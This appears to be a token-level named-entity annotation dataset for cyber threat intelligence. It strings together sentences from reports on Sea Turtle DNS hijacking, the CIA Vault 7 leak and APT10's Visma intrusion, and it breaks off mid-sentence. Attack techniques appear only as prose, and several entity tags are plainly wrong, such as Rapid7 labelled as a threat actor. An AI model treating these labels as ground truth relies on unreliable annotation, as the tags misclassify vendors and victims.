+actor S-APT +during O +the O +observed O +attacks O +. O +The O +attackers S-APT +would O +then O +use O +the O +certificate O +on O +actor-controlled O +servers O +to O +perform O +additional O +MitM S-MAL +operations O +to O +harvest O +additional O +credentials O +. O +In O +some O +cases O +, O +the O +victims O +were O +redirected O +to O +these O +actor-controlled S-APT +servers S-MAL +displaying O +the O +stolen O +certificate O +. 
O +One O +notable O +aspect O +of O +the O +campaign O +was O +the O +actors' S-APT +ability O +to O +impersonate O +VPN B-MAL +applications E-MAL +, O +such O +as O +Cisco O +Adaptive B-MAL +Security I-MAL +Appliance E-MAL +(ASA) O +products O +, O +to O +perform O +MitM O +attacks O +. O +At O +this O +time O +, O +we O +do O +not O +believe O +that O +the O +attackers S-APT +found O +a O +new O +ASA S-TOOL +exploit S-VULNAME +. O +Rather O +, O +they S-APT +likely O +abused O +the O +trust O +relationship O +associated O +with O +the O +ASA's S-MAL +SSL O +certificate O +to O +harvest O +VPN S-TOOL +credentials O +to O +gain O +remote O +access O +to O +the O +victim's O +network O +. O +As O +an O +example O +, O +DNS S-PROT +records O +indicate O +that O +a O +targeted O +domain O +resolved O +to O +an O +actor-controlled S-APT +MitM B-MAL +server E-MAL +. O +In O +another O +case O +, O +the O +attackers S-APT +were O +able O +to O +compromise B-ACT +NetNod E-ACT +, O +a O +non-profit O +, O +independent O +internet O +infrastructure O +organization O +based O +in O +Sweden S-LOC +. O +Using O +this O +access O +, O +the O +threat O +actors S-APT +were O +able O +to O +manipulate S-ACT +the O +DNS S-PROT +records O +for O +sa1[.]dnsnode[.]net O +. O +This O +redirection O +allowed O +the O +attackers S-APT +to O +harvest O +credentials O +of O +administrators O +who O +manage O +domains O +with O +the O +TLD O +of O +Saudi B-LOC +Arabia E-LOC +(.sa) O +. O +In O +one O +of O +the O +more O +recent O +campaigns S-ACT +on O +March B-TIME +27 E-TIME +, O +2019 O +, O +the O +threat O +actors S-APT +targeted O +the O +Sweden-based O +consulting O +firm O +Cafax S-IDTY +. O +We O +assess O +with O +high O +confidence O +that O +Sea B-ACT +Turtle E-ACT +was O +targeted O +in O +an O +attempt O +to O +re-establish O +access O +to O +the O +NetNod S-IDTY +network O +, O +which O +was O +previously O +compromised O +by O +this O +threat O +actor O +. 
O +Obtaining O +access O +to O +this O +ccTLD O +registrars O +would O +have O +allowed O +attackers S-APT +to O +hijack O +any O +domain O +that O +used O +those O +ccTLDs O +. O +These O +actors S-APT +perform O +DNS S-PROT +hijacking O +through O +the O +use O +of O +actor-controlled O +name B-MAL +servers E-MAL +. O +Sea B-APT +Turtle E-APT +have O +been O +more O +aggressive O +in O +their O +pursuit O +targeting O +DNS B-IDTY +registries E-IDTY +and O +a O +number B-IDTY +of I-IDTY +registrars E-IDTY +, O +including O +those O +that O +manage O +ccTLDs O +. O +These O +actors S-APT +use O +Let's O +Encrypts S-MAL +, O +Comodo S-MAL +, O +Sectigo S-MAL +, O +and O +self-signed B-MAL +certificates E-MAL +in O +their O +MitM B-MAL +servers E-MAL +to O +gain O +the O +initial O +round O +of O +credentials O +. O +These O +actors S-APT +have O +been O +more O +aggressive O +in O +their O +pursuit O +targeting O +DNS S-PROT +registries O +and O +a O +number O +of O +registrars O +, O +including O +those O +that O +manage S-IDTY +ccTLDs S-IDTY +. O +Once O +they O +have O +access B-ACT +to I-ACT +the I-ACT +network E-ACT +, O +they S-APT +steal O +the O +organization's O +legitimate O +SSL O +certificate O +and O +use O +it O +on O +actor-controlled S-MAL +servers S-MAL +. O +we O +believe O +that O +the O +Sea B-ACT +Turtle E-ACT +campaign O +continues O +to O +be O +highly O +successful O +for O +several O +reasons O +. O +Had O +more O +ccTLDs S-ACT +implemented O +security O +features O +such O +as O +registrar O +locks O +, O +attackers S-APT +would O +be O +unable O +to O +redirect O +the O +targeted O +domains O +. O +The O +attackers S-APT +stole O +organizations' O +SSL O +certificates O +associated O +with O +security O +appliances O +such O +as O +ASA S-MAL +to O +obtain O +VPN S-TOOL +credentials O +, O +allowing O +the O +actors O +to O +gain O +access O +to O +the O +targeted O +network O +. 
O +The O +threat O +actors S-APT +were O +able O +to O +maintain S-ACT +long O +term O +persistent O +access O +to O +many O +of O +these O +networks O +by O +utilizing B-ACT +compromised I-ACT +credentials E-ACT +. O +Cisco B-SECTEAM +Talos E-SECTEAM +will O +continue O +to O +monitor O +Sea B-ACT +Turtle E-ACT +and O +work O +with O +our O +partners O +to O +understand O +the O +threat O +as O +it O +continues O +to O +evolve O +to O +ensure O +that O +our O +customers O +remain O +protected O +and O +the O +public O +is O +informed O +. O +If O +the O +user O +enables O +macro O +to O +open O +the O +xlsm B-MAL +file E-MAL +, O +it S-FILE +will O +then O +drop O +the O +legitimate O +script O +engine O +AutoHotkey O +along O +with O +a O +malicious O +script O +file O +. O +Create O +a O +link B-FILE +file E-FILE +in O +the O +startup O +folder O +for O +AutoHotkeyU32.exe S-FILE +, O +allowing O +the O +attack O +to O +persist O +even O +after O +a O +system O +restart O +. O +More O +importantly O +, O +one O +of O +these O +files O +also O +enables O +the O +download S-ACT +of O +TeamViewer S-MAL +, O +a O +remote O +access O +tool O +that O +gives O +threat O +actors S-APT +remote O +control O +over O +the O +system O +. O +Such O +attacks S-FILE +highlight O +the O +need O +for O +caution O +before O +downloading B-ACT +files E-ACT +from O +unknown O +sources O +and O +enabling O +macro O +for O +files O +from O +unknown O +sources O +. O +The O +agency's O +hacking B-APT +division E-APT +freed O +it O +from O +having O +to O +disclose O +its O +often O +controversial O +operations O +to O +the O +NSA S-IDTY +(its O +primary O +bureaucratic O +rival) O +in O +order O +to O +draw O +on O +the O +NSA's O +hacking O +capacities O +. 
O +By O +the O +end O +of O +2016 S-TIME +, O +the O +CIA's B-APT +hacking I-APT +division E-APT +, O +which O +formally O +falls O +under O +the O +agency's O +Center O +for O +Cyber O +Intelligence O +(CCI) O +, O +had O +over O +5000 O +registered O +users O +and O +had O +produced O +more O +than O +a O +thousand O +hacking B-MAL +systems E-MAL +, O +trojans S-MAL +, O +viruses S-MAL +, O +and O +other O +weaponized S-MAL +malware S-MAL +. O +Such O +is O +the O +scale O +of O +the O +CIA's S-LOC +undertaking O +that O +by O +2016 S-TIME +, O +its O +hackers O +had O +utilized O +more O +code O +than O +that O +used O +to O +run O +Facebook O +. O +Wikileaks S-SECTEAM +has O +carefully O +reviewed O +the O +Year O +Zero O +disclosure O +and O +published O +substantive O +CIA S-APT +documentation O +while O +avoiding O +the O +distribution O +of O +'armed' O +cyberweapons O +until O +a O +consensus O +emerges O +on O +the O +technical O +and O +political O +nature O +of O +the O +CIA's O +program O +and O +how O +such O +'weapons' O +should O +analyzed O +, O +disarmed O +and O +published O +. O +These O +redactions O +include O +ten O +of O +thousands O +of O +CIA S-APT +targets O +and O +attack O +machines O +throughout O +Latin B-LOC +America E-LOC +, O +Europe S-LOC +and O +the B-LOC +United I-LOC +States E-LOC +. O +The O +increasing O +sophistication O +of O +surveillance O +techniques O +has O +drawn O +comparisons O +with O +George O +Orwell's O +1984 O +, O +but O +Weeping B-MAL +Angel E-MAL +, O +developed O +by O +the O +CIA's S-APT +Embedded O +Devices O +Branch O +(EDB) O +, O +which O +infests O +smart B-MAL +TVs E-MAL +, O +transforming O +them O +into O +covert O +microphones O +, O +is O +surely O +its O +most O +emblematic O +realization O +. 
O +After O +infestation O +, O +Weeping B-APT +Angel E-APT +places O +the O +target O +TV O +in O +a O +'Fake-Off' O +mode O +, O +so O +that O +the O +owner O +falsely O +believes O +the O +TV O +is O +off O +when O +it O +is O +on O +. O +As O +of O +October B-TIME +2014 E-TIME +the O +CIA S-APT +was O +also O +looking O +at O +infecting O +the O +vehicle O +control O +systems O +used O +by O +modern O +cars O +and O +trucks O +. O +The O +CIA's S-APT +Mobile O +Devices O +Branch O +(MDB) O +developed O +numerous O +attacks O +to O +remotely O +hack O +and O +control O +popular O +smart O +phones O +. O +Despite O +iPhone's O +minority O +share O +(14.5%) O +of O +the O +global O +smart O +phone O +market O +in O +2016 S-TIME +, O +a O +specialized O +unit O +in O +the O +CIA's S-APT +Mobile O +Development O +Branch O +produces O +malware O +to O +infest O +, O +control O +and O +exfiltrate O +data O +from O +iPhones S-MAL +and O +other O +Apple S-MAL +products O +running O +iOS S-MAL +, O +such O +as O +iPads S-MAL +. O +The O +attack O +against O +Samsung B-IDTY +smart I-IDTY +TVs E-IDTY +was O +developed O +in O +cooperation O +with O +the O +United B-LOC +Kingdom's E-LOC +MI5/BTSS S-APT +. O +CIA's S-APT +arsenal O +includes O +numerous O +local O +and O +remote O +zero B-ACT +days E-ACT +developed O +by O +CIA O +or O +obtained O +from O +GCHQ S-MAL +, O +NSA S-MAL +, O +FBI O +or O +purchased O +from O +cyber B-MAL +arms I-MAL +contractors E-MAL +such O +as O +Baitshop O +. O +These O +techniques O +permit O +the O +CIA S-APT +to O +bypass O +the O +encryption O +of O +WhatsApp O +, O +Signal O +, O +Telegram O +, O +Wiebo O +, O +Confide O +and O +Cloackman O +by O +hacking O +the O +smart O +phones O +that O +they O +run O +on O +and O +collecting O +audio O +and O +message O +traffic O +before O +encryption O +is O +applied O +. 
O +The O +CIA S-APT +also O +runs O +a O +very O +substantial O +effort O +to O +infect O +and O +control O +Microsoft S-IDTY +Windows S-OS +users O +with O +its O +malware O +. O +CIA's S-APT +malware O +includes O +multiple O +local O +and O +remote O +weaponized O +zero B-ACT +days E-ACT +, O +air O +gap O +jumping O +viruses O +such O +as O +Hammer B-MAL +Drill E-MAL +which O +infects O +software O +distributed O +on O +CD/DVDs O +, O +infectors O +for O +removable O +media O +such O +as O +USBs O +, O +systems O +to O +hide O +data O +in O +images O +or O +in O +covert O +disk O +LOCs O +Brutal B-MAL +Kangaroo E-MAL +and O +to O +keep O +its O +malware O +infestations O +going O +. O +Many O +of O +these O +infection O +efforts O +are O +pulled O +together O +by O +the O +CIA's S-APT +Automated O +Implant O +Branch O +(AIB) O +, O +which O +has O +developed O +several O +attack O +systems O +for O +automated O +infestation O +and O +control O +of O +CIA O +malware O +, O +such O +as O +Assassin S-MAL +and O +Medusa S-MAL +. O +The O +CIA S-APT +has O +developed O +automated O +multi-platform O +malware O +attack O +and O +control O +systems O +covering O +Windows S-MAL +, O +Mac B-MAL +OS I-MAL +X E-MAL +, O +Solaris S-MAL +, O +Linux S-MAL +and O +more O +, O +such O +as O +EDB's O +HIVE S-MAL +and O +the O +related O +Cutthroat S-MAL +and O +Swindle S-MAL +tools O +, O +which O +are O +described O +in O +the O +examples O +section O +below O +. O +By O +hiding O +these O +security O +flaws O +from O +manufacturers O +like O +Apple S-IDTY +and O +Google S-IDTY +the O +CIA S-APT +ensures O +that O +it O +can O +hack O +everyone O +&mdsh; O +at O +the O +expense O +of O +leaving O +everyone O +hackable O +. 
O +Once O +in O +Frankfurt S-LOC +CIA S-APT +hackers O +can O +travel O +without O +further O +border O +checks O +to O +the O +25 O +European B-LOC +countries E-LOC +that O +are O +part O +of O +the O +Shengen O +open O +border O +LOC O +— O +including O +France S-LOC +, O +Italy S-LOC +and O +Switzerland S-LOC +. O +A O +number O +of O +the O +CIA's S-APT +electronic O +attack O +methods O +are O +designed O +for O +physical B-ACT +proximity E-ACT +. O +The O +attacker S-APT +is O +provided O +with O +a O +USB B-MAL +containing I-MAL +malware E-MAL +developed O +for O +the O +CIA O +for O +this O +purpose O +, O +which O +is O +inserted O +into O +the O +targeted O +computer O +. O +The O +attacker S-APT +then O +infects O +and O +exfiltrates O +data O +to O +removable O +media S-IDTY +. O +As O +an O +example O +, O +specific O +CIA S-APT +malware S-MAL +revealed O +in O +Year O +Zero O +is O +able O +to O +penetrate O +, O +infest O +and O +control O +both O +the O +Android S-OS +phone O +and O +iPhone O +software O +that O +runs O +or O +has O +run O +presidential O +Twitter O +accounts O +. O +For O +example O +, O +the O +CIA O +attack O +system O +Fine O +Dining O +, O +provides O +24 O +decoy O +applications O +for O +CIA O +spies O +to O +use O +. O +For O +example O +, O +Comodo S-IDTY +was O +defeated O +by O +CIA S-APT +malware O +placing O +itself O +in O +the O +Window's O +Recycle O +Bin O +. O +CIA S-SECTEAM +hackers O +discussed O +what O +the O +NSA's O +Equation B-APT +Group E-APT +hackers O +did O +wrong O +and O +how O +the O +CIA's O +malware O +makers O +could O +avoid O +similar O +exposure O +. O +The O +CIA's S-APT +Remote O +Devices O +Branch's O +UMBRAGE S-APT +group O +collects O +and O +maintains O +a O +substantial O +library O +of O +attack O +techniques O +'stolen' O +from O +malware O +produced O +in O +other O +states O +including O +the O +Russian S-LOC +Federation O +. 
O +This O +information O +is O +used O +by O +the O +CIA's S-APT +'JQJIMPROVISE' S-MAL +software O +(see O +below) O +to O +configure O +a O +set O +of O +CIA O +malware O +suited O +to O +the O +specific O +needs O +of O +an O +operation O +. O +Its O +configuration O +utilities O +like O +Margarita S-FILE +allows O +the O +NOC O +(Network O +Operation O +Center) O +to O +customize O +tools O +based O +on O +requirements O +from O +'Fine O +Dining' O +questionairies O +. O +HIVE S-MAL +is O +a O +multi-platform O +CIA S-APT +malware O +suite O +and O +its O +associated O +control O +software O +. O +A O +series O +of O +standards O +lay O +out O +CIA S-APT +malware O +infestation O +patterns O +which O +are O +likely O +to O +assist O +forensic O +crime O +scene O +investigators O +as O +well O +as O +Apple S-IDTY +, O +Microsoft S-IDTY +, O +Google S-IDTY +, O +Samsung S-IDTY +, O +Nokia S-IDTY +, O +Blackberry S-IDTY +, O +Siemens S-IDTY +and O +anti-virus B-IDTY +companies E-IDTY +attribute O +and O +defend O +against O +attacks O +. O +In O +April B-TIME +2013 E-TIME +, O +Kaspersky S-SECTEAM +Lab O +reported O +that O +a O +popular O +game O +was O +altered O +to O +include O +a O +backdoor O +in O +2011 O +. O +Yet O +again O +, O +new O +supply-chain B-ACT +attacks E-ACT +recently O +caught O +the O +attention O +of O +ESET S-SECTEAM +Researchers O +. O +Given O +that O +these O +attacks O +were O +mostly O +targeted O +against O +Asia S-LOC +and O +the O +gaming B-IDTY +industry E-IDTY +, O +it O +shouldn’t O +be O +surprising O +they O +are O +the O +work O +of O +the O +group O +described O +in O +Kaspersky’s S-SECTEAM +Winnti S-APT +– O +More O +than O +just O +a O +game” O +. O +The O +OSB S-MAL +functions O +as O +the O +interface O +between O +CIA S-APT +operational O +staff O +and O +the O +relevant O +technical O +support O +staff O +. 
O +A O +sustained O +cyberespionage O +campaign B-ACT +targeting E-ACT +at O +least O +three O +companies O +in O +the O +United O +States O +and O +Europe O +was O +uncovered O +by O +Recorded B-SECTEAM +Future E-SECTEAM +and O +Rapid7 S-SECTEAM +between O +November B-TIME +2017 E-TIME +and O +September B-TIME +2018 E-TIME +. O +The O +Honeycomb S-FILE +toolserver O +receives O +exfiltrated O +information O +from O +the O +implant; O +an O +operator O +can O +also O +task O +the O +implant O +to O +execute O +jobs O +on O +the O +target O +computer O +, O +so O +the O +toolserver O +acts O +as O +a O +C2 S-TOOL +(command O +and O +control) O +server O +for O +the O +implant O +. O +The O +attackers O +then O +enumerated O +access O +and O +conducted O +privilege O +escalation O +on O +the O +victim O +networks O +, O +utilizing O +DLL B-ACT +sideloading E-ACT +techniques O +documented O +in O +a O +US-CERT O +alert O +on O +APT10 S-APT +to O +deliver O +malware O +. O +On O +the O +two O +other O +victim O +networks O +, O +the O +attackers O +deployed O +a O +unique O +version O +of O +the O +UPPERCUT S-MAL +(ANEL) O +backdoor O +, O +known O +to O +have O +only O +been O +used O +by O +APT10 S-APT +. O +APT10 S-APT +actors O +then O +compressed O +proprietary O +data O +from O +Visma O +using O +WinRAR S-MAL +(deployed O +by O +the O +attackers) O +and O +exfiltrated O +to O +a O +Dropbox S-TOOL +account O +using O +the O +cURL S-MAL +for O +Windows S-OS +command-line O +tool O +. O +UMBRAGE S-FILE +components O +cover O +keyloggers O +, O +password O +collection O +, O +webcam O +capture O +, O +data O +destruction O +, O +persistence O +, O +privilege O +escalation O +, O +stealth O +, O +anti-virus O +(PSP) O +avoidance O +and O +survey O +techniques O +. 
O +we O +assess O +with O +high O +confidence O +that O +these O +incidents O +were O +conducted O +by O +APT10 S-APT +also O +known O +as O +Stone B-APT +Panda E-APT +, O +menuPass S-APT +, O +CVNX S-APT +in O +an O +effort O +to O +gain O +access O +to O +networks O +and O +steal O +valuable O +intellectual O +property O +or O +gain O +commercial O +advantage O +. O +On O +top O +of O +the O +breadth O +, O +volume O +, O +and O +targets O +of O +attacks O +that O +APT10 S-APT +has O +conducted O +since O +at O +least O +2016 S-TIME +, O +we O +now O +know O +that O +these O +operations O +are O +being O +run O +by O +the O +Chinese B-LOC +intelligence I-LOC +agency E-LOC +, O +the O +Ministry O +of O +State O +Security O +(MSS) O +. O +Utilizing O +actors O +working O +for O +shell O +companies O +such O +as O +Huaying O +Haitai O +Science O +and O +Technology O +Development O +Co O +Ltd O +, O +the O +MSS S-APT +has O +conducted O +an O +unprecedented O +campaign O +, O +dubbed O +Operation O +Cloud O +Hopper O +, O +” O +against O +managed O +IT O +service O +providers O +(MSPs) O +designed O +to O +steal O +intellectual O +property O +and O +enable O +secondary O +attacks O +against O +their O +clients O +. O +We O +assess O +that O +APT10 S-APT +likely O +compromised O +Visma O +with O +the O +primary O +goal O +of O +enabling O +secondary O +intrusions O +onto O +their O +client O +networks O +, O +and O +not O +of O +stealing O +Visma O +intellectual O +property O +. O +In O +this O +same O +time O +frame O +, O +APT10 S-APT +also O +targeted O +a O +U.S. B-IDTY +law I-IDTY +firm E-IDTY +and O +an O +international O +apparel B-IDTY +company E-IDTY +, O +likely O +to O +gather O +information O +for O +commercial O +advantage O +. 
O +The O +backdoor O +was O +deployed O +using O +the O +Notepad++ O +updater O +and O +sideloading O +malicious O +DLL S-TOOL +, O +as O +noted O +in O +APT10’s S-APT +targeting O +of O +Japanese B-IDTY +corporations E-IDTY +in O +July S-TIME +2018 S-TIME +. O +That O +attack O +was O +attributed O +to O +perpetrators O +Kaspersky S-SECTEAM +called O +the O +Winnti B-APT +Group E-APT +. O +APT10 S-APT +is O +a O +threat O +actor O +that O +has O +been O +active O +since O +at O +least O +2009 S-TIME +. O +APT10 S-APT +has O +historically O +targeted O +healthcare S-IDTY +, O +defense S-IDTY +, O +aerospace S-IDTY +, O +government S-IDTY +, O +heavy B-IDTY +industry E-IDTY +and O +mining S-IDTY +, O +and O +MSPs S-IDTY +and O +IT B-IDTY +services E-IDTY +, O +as O +well O +as O +other O +sectors S-IDTY +, O +for O +probable O +intellectual O +property O +theft O +. O +We O +believe O +APT10 S-APT +is O +the O +most O +significant O +Chinese B-LOC +state-sponsored E-LOC +cyber O +threat O +to O +global O +corporations O +known O +to O +date O +. O +In O +the O +blog O +, O +Intrusion O +Truth O +identified O +APT10 S-APT +as O +having O +utilized O +several O +Tianjin-based B-IDTY +companies E-IDTY +, O +including O +Huaying B-IDTY +Haitai I-IDTY +Science E-IDTY +and O +Technology O +Development O +Co. O +Ltd. O +and O +Laoying O +Baichen O +Instruments O +Equipment O +Co. O +Ltd O +. O +Based O +on O +the O +technical O +data O +uncovered O +, O +and O +in O +light O +of O +recent O +disclosures O +by O +the O +U.S. S-LOC +Department S-LOC +of O +Justice O +on O +the O +ongoing O +activities O +of O +Chinese B-APT +state-sponsored E-APT +threat O +actors O +. O +Our O +research O +from O +2017 S-TIME +concluded O +that O +Guangdong B-APT +ITSEC E-APT +(and O +therefore O +the O +MSS) O +directed O +the O +activities O +of O +a O +company O +named O +Boyusec S-IDTY +, O +which O +was O +identified O +as O +a O +shell O +company O +for O +APT3 S-APT +. 
O +Access O +to O +the O +networks O +of O +these O +third-party O +service O +providers O +grants O +the O +MSS S-APT +the O +ability O +to O +potentially O +access O +the O +networks O +of O +hundreds O +, O +if O +not O +thousands O +, O +of O +corporations O +around O +the O +world O +. O +The O +December O +APT10 S-APT +indictment O +noted O +that O +the O +group’s O +malicious O +activities O +breached O +at O +least O +45 O +companies O +and O +managed O +service O +providers O +in O +12 O +countries O +, O +including O +Brazil S-LOC +, O +Canada S-LOC +, O +Finland S-LOC +, O +France S-LOC +, O +Germany S-LOC +, O +India S-LOC +, O +Japan S-LOC +, O +Sweden S-LOC +, O +Switzerland O +, O +the O +United B-LOC +Arab I-LOC +Emirates E-LOC +, O +the B-LOC +United I-LOC +Kingdom E-LOC +, O +and O +the B-LOC +United I-LOC +States E-LOC +. O +In O +all O +three O +incidents O +, O +APT10 S-APT +gained O +access O +to O +networks O +through O +deployments O +of O +Citrix S-MAL +and O +LogMeIn S-MAL +remote-access O +software O +using O +stolen O +valid O +user O +credentials O +. O +In O +all O +three O +incidents O +, O +the O +attackers S-APT +gained O +access O +to O +networks O +through O +deployments O +of O +Citrix O +and O +LogMeIn O +remote-access O +software O +using O +stolen S-ACT +valid O +user O +credentials O +. O +In O +all O +three O +incidents O +, O +APT10 S-APT +actors O +used S-ACT +previously O +acquired O +legitimate O +credentials O +, O +possibly O +gained O +via O +a O +third-party O +supply O +chain O +compromise O +in O +order O +to O +gain O +initial O +access O +to O +the O +law B-IDTY +firm E-IDTY +and O +the O +apparel B-IDTY +company E-IDTY +. O +In O +early O +2017 S-TIME +, O +APT10 S-APT +began O +conducting O +attacks O +against O +global O +managed O +IT B-IDTY +service E-IDTY +providers O +(MSPs) S-IDTY +that O +granted O +them O +unprecedented O +access O +to O +MSPs O +and O +their O +customers’ O +networks O +. 
O +'Improvise' S-FILE +is O +a O +toolset O +for O +configuration O +, O +post-processing O +, O +payload O +setup O +and O +execution O +vector O +selection O +for O +survey/Exfiltration S-ACT +tools O +supporting O +all O +major O +operating O +systems O +like O +Windows S-OS +(Bartender) O +, O +MacOS S-OS +( O +JukeBox S-TOOL +) O +and O +Linux S-ACT +( O +DanceFloor S-TOOL +) O +. O +. O +During O +this O +operation O +(dubbed O +‘Cloud O +Hopper” O +because O +of O +the O +group’s O +use O +of O +popular O +western O +cloud-based O +services) O +, O +APT10 S-APT +utilized O +both O +new O +malware O +(Quasar B-MAL +RAT E-MAL +, O +Trochilus S-MAL +, O +RedLeaves S-MAL +, O +ChChes S-MAL +as O +well O +as O +some O +familiar O +old O +tools O +. O +Most O +recently O +, O +on O +December B-TIME +20 E-TIME +, O +2018 S-TIME +, O +the O +U.S. B-SECTEAM +Department E-SECTEAM +of O +Justice O +charged O +two O +hackers O +associated O +with O +the O +Chinese O +Ministry O +of O +State O +Security O +(MSS) S-LOC +with O +global O +computer O +intrusion O +campaigns O +targeting O +intellectual O +property O +. O +This O +indictment O +attributed O +the O +intrusions O +to O +APT10 S-APT +, O +a O +group O +that O +had O +been O +conducting O +the O +malicious O +activities O +for O +over O +a O +decade O +on O +behalf O +of O +the O +MSS O +, O +China’s S-LOC +civilian O +human O +intelligence O +agency O +. O +The O +Visma S-APT +group O +operates O +across O +the O +entire O +Nordic O +region O +along O +with O +Benelux S-LOC +, O +Central S-LOC +, O +and O +Eastern B-LOC +Europe E-LOC +. O +Recorded B-SECTEAM +Future E-SECTEAM +has O +actively O +tracked O +APT10 S-APT +for O +several O +years O +, O +focusing O +specifically O +on O +the O +group’s O +targeting O +of O +MSPs O +and O +global O +internet O +infrastructure O +providers O +since O +the O +Operation O +Cloud O +Hopper O +report O +in O +2017 O +. 
O +We O +were O +particularly O +interested O +in O +identifying O +whether O +any O +customers O +of O +the O +targeted O +MSPs O +were O +subsequently O +compromised O +by O +APT10 S-APT +, O +given O +their O +potential O +access O +through O +compromised O +MSP S-IDTY +networks O +. O +Recorded B-SECTEAM +Future’s E-SECTEAM +Insikt O +Group O +has O +actively O +tracked O +APT10 O +for O +several O +years O +, O +focusing O +specifically O +on O +the O +group’s O +targeting O +of O +MSPs S-IDTY +and O +global O +internet O +infrastructure B-IDTY +providers E-IDTY +since O +the O +Operation O +Cloud O +Hopper O +report O +in O +2017 S-TIME +. O +In O +September B-TIME +2018 E-TIME +, O +one O +of O +our O +clients O +(and O +a O +supplier O +as O +well) O +, O +Visma O +, O +reached O +out O +to O +us O +for O +assistance O +in O +investigating O +an O +incident O +uncovered O +on O +their O +network O +following O +a O +breach O +notification O +by O +Rapid7 S-APT +. O +This O +was O +followed O +by O +an O +initial O +exploitation O +, O +network O +enumeration O +, O +and O +malicious O +tool O +deployment O +on O +various O +Visma B-MAL +endpoints E-MAL +within O +two O +weeks O +of O +initial O +access O +. O +On O +August B-TIME +30 E-TIME +, O +2018 S-TIME +, O +APT10 S-APT +deployed O +their O +first O +modified O +version O +of O +Trochilus S-MAL +that O +had O +its O +C2 S-TOOL +communications O +encrypted O +using O +Salsa20 O +and O +RC4 S-ENCR +ciphers O +instead O +of O +the O +more O +common O +RC4-encrypted S-ENCR +Trochilus O +variant O +seen O +in O +the O +wild O +. 
O +This O +sample S-FILE +, O +similar O +to O +other O +Trochilus S-FILE +samples O +, O +was O +deployed O +using O +a O +DLL S-TOOL +sideloading O +method O +utilizing O +three O +files O +, O +uploaded O +to O +the O +same O +folder O +on O +the O +victim O +machine O +as O +identified O +in O +US-CERT O +advisory O +TA17-117A O +last O +revised O +on O +December O +20 O +, O +2018 S-TIME +. O +The O +configuration B-FILE +file E-FILE +then O +loads O +the O +Trochilus O +payload O +into O +memory O +by O +injecting O +it O +into O +a O +valid O +system O +process O +. O +APT10 S-APT +also O +used O +WinRAR S-MAL +and O +cURL S-MAL +for O +Windows S-OS +, O +both O +often O +renamed O +, O +to O +compress O +and O +upload O +the O +exfiltrated O +files O +from O +the O +Visma O +network O +to O +the O +Dropbox S-TOOL +API O +. O +In O +order O +to O +exfiltrate O +the O +compromised O +data O +, O +APT10 S-APT +employed O +custom O +malware O +that O +used O +Dropbox S-MAL +as O +its O +C2 S-TOOL +. O +They O +also O +used O +WinRAR S-TOOL +and O +cURL O +for O +Windows S-OS +, O +both O +often O +renamed O +, O +to O +compress O +and O +upload O +the O +exfiltrated O +files O +from O +the O +Visma S-MAL +network O +to O +the O +Dropbox B-MAL +API E-MAL +. O +Our O +research O +partner O +Rapid7 S-SECTEAM +investigated O +the O +Dropbox S-MAL +use O +and O +found O +that O +the O +attackers S-APT +had O +used O +the O +same O +account O +to O +store O +exfiltrated O +data O +from O +a O +global O +apparel O +company O +. O +They S-SECTEAM +also O +identified O +broadly O +similar O +TTPs O +being O +used O +in O +the O +attack B-ACT +against E-ACT +a O +U.S. O +law O +firm O +specializing O +in O +intellectual O +property O +law O +. 
O +Rapid7’s S-SECTEAM +investigation O +revealed O +the O +law B-IDTY +firm E-IDTY +was O +first O +targeted O +in O +late O +2017 S-TIME +, O +followed O +by O +the O +apparel O +company O +a O +few O +months O +later O +, O +and O +finally O +, O +the O +Visma B-ACT +attack E-ACT +in O +August B-TIME +2018 E-TIME +. O +In O +one O +of O +the O +attacks O +, O +Rapid7 S-SECTEAM +identified O +the O +attackers S-APT +escaping O +a O +Citrix S-MAL +application O +in O +order O +to O +run O +the O +payload O +script O +on O +the O +victim O +desktop O +. O +Additionally O +, O +the O +same O +DLL S-TOOL +sideloading O +technique O +observed O +in O +the O +Visma S-MAL +attack O +was O +used O +, O +and O +many O +of O +the O +tools O +deployed O +by O +the O +APT10 S-APT +shared O +naming O +similarities O +as O +well O +1.bat S-MAL +, O +cu.exe S-MAL +, O +ss.rar S-MAL +, O +r.exe S-MAL +, O +pd.exe S-MAL +. O +Most O +interestingly O +, O +Rapid7 S-SECTEAM +observed O +the O +use O +of O +the O +Notepad++ O +updater O +gup.exe S-FILE +as O +a O +legitimate O +executable O +to O +sideload O +a O +malicious O +DLL S-TOOL +(libcurl.dll) O +in O +order O +to O +deploy O +a O +variant O +of O +the O +UPPERCUT O +backdoor O +also O +known O +as O +ANEL S-FILE +. O +APT10 S-APT +used O +this O +approach O +to O +deploy O +UPPERCUT S-MAL +when O +targeting O +Japanese B-IDTY +corporations E-IDTY +in O +July B-TIME +2018 E-TIME +. O +APT10 S-APT +actors O +gained O +initial O +access O +to O +the O +Visma B-MAL +network E-MAL +around O +August B-TIME +17 E-TIME +, O +2018 S-TIME +. O +While O +we O +are O +confident O +that O +APT10 S-APT +actors O +gained O +access O +to O +the O +Visma S-IDTY +network O +in O +August O +using O +stolen O +employee O +Citrix B-MAL +remote I-MAL +desktop E-MAL +credentials O +, O +it O +is O +not O +clear O +how O +or O +when O +these O +credentials O +were O +initially O +compromised O +. 
O +Insikt B-APT +Group E-APT +analysis O +of O +network O +metadata O +to O +and O +from O +the O +VPN S-TOOL +endpoint O +IPs O +revealed O +consistent O +connectivity O +to O +Citrix-hosted S-FILE +infrastructure O +from O +all O +eight O +VPN S-TOOL +endpoint O +IPs O +starting O +on O +August B-TIME +17 E-TIME +, O +2018 S-TIME +— O +the O +same O +date O +the O +first O +authenticated O +login O +to O +Visma’s O +network O +was O +made O +using O +stolen O +credentials O +. O +After O +almost O +two O +weeks O +, O +on O +August B-TIME +30 E-TIME +, O +2018 S-TIME +, O +APT10 S-APT +attackers O +used O +their O +access O +to O +the O +network O +to O +move O +laterally O +and O +made O +their O +first O +deployment O +of O +an O +RC4- O +and O +Salsa20-encrypted S-ENCR +variant O +of O +the O +Trochilus S-MAL +malware O +using O +a O +previously O +associated O +DLL S-TOOL +sideloading O +techniquE O +. O +This O +means O +that O +APT10 S-APT +actors O +had O +two O +separate O +access O +points O +into O +the O +Visma B-MAL +network E-MAL +. O +This O +slight O +delay O +may O +point O +to O +the O +handing O +over O +of O +active O +exploitation O +duties O +to O +other O +operator(s) O +in O +a O +multi-team O +APT10 S-APT +effort O +within O +the O +Ministry S-LOC +of O +State O +Security O +for O +the O +attack O +. O +Other O +examples O +of O +malicious O +infrastructure O +registered O +with O +internet.bs O +include O +domains O +for O +APT28’s S-APT +VPNFilter S-MAL +malware O +campaign O +and O +the O +registration O +of O +the O +cyber-berkut S-MAL +. O +org O +domain O +that O +was O +affiliated O +with O +the O +pro-Russian S-LOC +and O +potentially O 